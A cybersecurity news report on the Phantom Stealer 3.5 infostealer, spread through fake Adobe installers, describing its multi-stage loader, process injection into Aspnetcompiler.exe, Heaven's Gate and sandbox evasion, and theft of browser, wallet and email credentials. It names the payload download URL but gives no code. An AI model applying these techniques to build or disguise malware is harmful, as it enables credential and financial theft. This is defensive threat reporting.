A sophisticated new threat known as Phantom Stealer version 3.5 is actively targeting users worldwide, aiming to steal sensitive data. This malware is currently being distributed through deceptive installers disguised as legitimate Adobe software, making it a significant concern for cybersecurity professionals and everyday computer users alike. The primary objective of Phantom Stealer is to extract critical information such as passwords, browser cookies, credit card details, and cryptocurrency wallet data.
First identified on October 29, 2025, the attack vector begins with a fake Adobe 11.7.7 installer file. Investigations by K7 Security Labs revealed that this file is actually an obfuscated XML document embedded with JavaScript code. Upon execution, this code initiates a chain of malicious activities, including downloading a PowerShell script from a remote server, which lays the groundwork for deeper system compromise.
Phantom Stealer Employs Multi-Stage Infection and Evasion Tactics
Researchers at K7 Security Labs have detailed a sophisticated multi-stage infection mechanism employed by Phantom Stealer. The malware initiates its operation by downloading an obfuscated PowerShell script from “positivepay-messages.com/file/floor.ps1.” This script is designed to execute with hidden attributes, thereby bypassing some standard security policies.
The downloaded PowerShell script contains RC4-encrypted data. Once decrypted, this data contains instructions for loading a .NET assembly directly into the system’s memory. This assembly is crucial for the subsequent stages of the malware’s operation, enabling it to perform more advanced malicious actions without being easily detected.
Following the execution of the PowerShell script, the next critical phase involves the BLACKHAWK.dll injector. This component is responsible for process injection, where it inserts malicious code into a legitimate and trusted Windows utility, specifically Aspnetcompiler.exe. By embedding itself within a system process, Phantom Stealer can operate covertly, making it more difficult for endpoint security solutions to identify and flag its activities.
The malware employs a persistent monitoring strategy, checking every five seconds to ensure that Aspnetcompiler.exe remains active. This ongoing vigilance allows the stealer to maintain its presence and continue its data collection efforts without interruption, making it a persistent threat to infected systems.
Phantom Stealer utilizes a range of advanced evasion techniques to avoid detection and hinder analysis. The malware includes numerous anti-analysis checks, designed to identify if it is running within a virtual machine, sandbox environment, or under any monitoring tools. This is achieved through suspicious username matching against a hardcoded list of 112 known sandbox usernames.
Should the malware detect such an environment, it initiates a self-destruction sequence. This involves creating a batch file that forcefully terminates its own process, thereby preventing security researchers from examining its behavior or extracting its code for analysis. This proactive measure demonstrates the malware’s developers’ efforts to protect their creation from scrutiny.
A particularly noteworthy evasion technique employed by the stealer is the use of “Heavens Gate.” This is an advanced user-mode hook evasion technique that facilitates a transition from 32-bit to 64-bit execution mode within a 32-bit process. This allows the malware to bypass 32-bit user-mode hooks, which are often used by security software to monitor process behavior. By executing native x64 system calls directly, Phantom Stealer can access sensitive data without triggering the security mechanisms designed to intercept such actions.
Once successfully embedded, Phantom Stealer begins to exfiltrate a wide array of sensitive information. This includes credentials for popular web browsers such as Chrome and Edge, obtained by accessing and decrypting their encrypted databases with extracted encryption keys. Additionally, it targets cryptocurrency wallet credentials, Outlook email configurations, keylogged data from user keystrokes, and general system information. For enhanced surveillance, the malware also captures screenshots of the victim’s screen every 1000 milliseconds.
The exfiltration of this stolen data is facilitated through multiple communication channels. Phantom Stealer utilizes protocols like SMTP and FTP, as well as popular communication platforms such as Telegram and Discord. The collected data is meticulously organized, typically with computer names and timestamps, creating a structured repository of victim information that can then be exploited for various malicious purposes.
The ongoing evolution and sophistication of threats like Phantom Stealer underscore the need for robust cybersecurity measures. Organizations are advised to implement comprehensive email filtering solutions, maintain regular software updates to patch vulnerabilities, and deploy advanced endpoint protection technologies. Continuous vigilance and updated security practices are essential to defend against this growing and adaptable threat landscape.